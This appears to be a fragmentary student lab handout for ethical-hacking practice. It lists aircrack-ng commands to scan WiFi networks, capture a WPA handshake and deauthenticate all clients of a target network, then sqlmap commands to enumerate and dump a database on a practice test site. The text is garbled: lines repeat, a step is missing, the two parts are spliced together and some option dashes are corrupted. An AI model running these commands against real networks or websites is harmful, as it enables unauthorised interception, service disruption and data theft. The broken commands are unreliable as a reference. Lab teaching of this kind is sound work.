Graded LAB 2
Graded LAB 2
Graded LAB 2
iwconfig
iwconfig
Note: Monitor mode allows you to capture network traffic, making it a crucial
step for ethical hacking tasks.
Step 1: Scan for Available Networks
● Use airodump-ng to scan for available networks:
airodump-ng --band abg wlan0
Step 2: Select the Target Network and Capture the WPA Handshake
● Use airodump-ng to capture the WPA handshake for the selected
network. Replace <mac> with the BSSID (MAC address) of the target
network and <channel> with the channel number:
airodump-ng --bssid <mac> --channel <channel> --write lab2 wlan0
Step 4: Deauthenticate Users
● Deauthenticate users on the target network to force a WPA handshake
capture:
aireplay-ng --deauth 0 -a <mac> wlan0
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –D
acurat --tables
● In the above D stands for database and in that database we are going
to check for all the tables
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D
acurat -T artists ——columns
● Now we know the database, tables in that database, and all the columns in
that table we dump all the data.